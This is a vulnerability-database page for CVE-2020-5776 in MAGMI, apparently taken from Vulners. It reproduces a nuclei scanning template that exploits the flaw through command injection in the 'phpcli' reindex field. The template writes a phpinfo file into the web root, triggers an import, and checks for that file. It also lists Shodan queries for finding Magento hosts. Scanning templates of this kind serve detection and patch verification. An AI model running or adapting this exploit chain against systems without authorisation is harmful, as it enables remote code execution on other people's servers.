Lucene search
K

MAGMI - Cross-Site Request Forgery

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

MAGMI - CSRF Vulnerability, Remote Code Executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-5776
26 Jan 202500:00
circl
Check Point Advisories
Magneto MAGMI Remote Code Execution (CVE-2020-5776)
15 Sep 202000:00
checkpoint_advisories
CVE
CVE-2020-5776
1 Sep 202020:34
cve
Cvelist
CVE-2020-5776
1 Sep 202020:34
cvelist
Github Security Blog
Cross-Site Request Forgery in MAGMI
6 May 202118:54
github
NVD
CVE-2020-5776
1 Sep 202021:15
nvd
OpenVAS
Magmi (Magento Mass Importer) <= 0.7.24 CSRF Vulnerability
2 Jul 202000:00
openvas
OSV
CVE-2020-5776
1 Sep 202021:15
osv
OSV
GHSA-CV7M-WC7G-7GFP Cross-Site Request Forgery in MAGMI
6 May 202118:54
osv
Prion
Cross site request forgery (csrf)
1 Sep 202021:15
prion
Rows per page
id: CVE-2020-5776

info:
  name: MAGMI - Cross-Site Request Forgery
  author: dwisiswant0
  severity: high
  description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.
  remediation: |
    Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.
  reference:
    - https://www.tenable.com/security/research/tra-2020-51
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5776
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/404notf0und/CVE-Flow
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-5776
    cwe-id: CWE-352
    epss-score: 0.14725
    epss-percentile: 0.96261
    cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: magmi_project
    product: magmi
    shodan-query:
      - http.component:"Magento"
      - http.component:"magento"
  tags: cve,cve2020,magmi,magento,tenable,magmi_project,vkev,vuln

variables:
  auth: '{{base64(username + ":" + password)}}'

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /magmi/web/magmi_saveprofile.php HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{auth}}
        Content-Type: application/x-www-form-urlencoded

        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Profile", "saved")'
        condition: and
        internal: true

  - raw:
      - |
        POST /magmi/web/magmi_run.php HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{auth}}
        Content-Type: application/x-www-form-urlencoded

        engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        GET /magmi/web/info.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "PHP Extension", "PHP Version")'
        condition: and
# digest: 4a0a004730450221008f4ed51e98a42259960484d57793389f7e446e614d9b43aa5cf06ab3fa2fea670220217154aae0b99f8164deebea171a7544aafb0bd17f5952ef2994eeb7977d22a6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation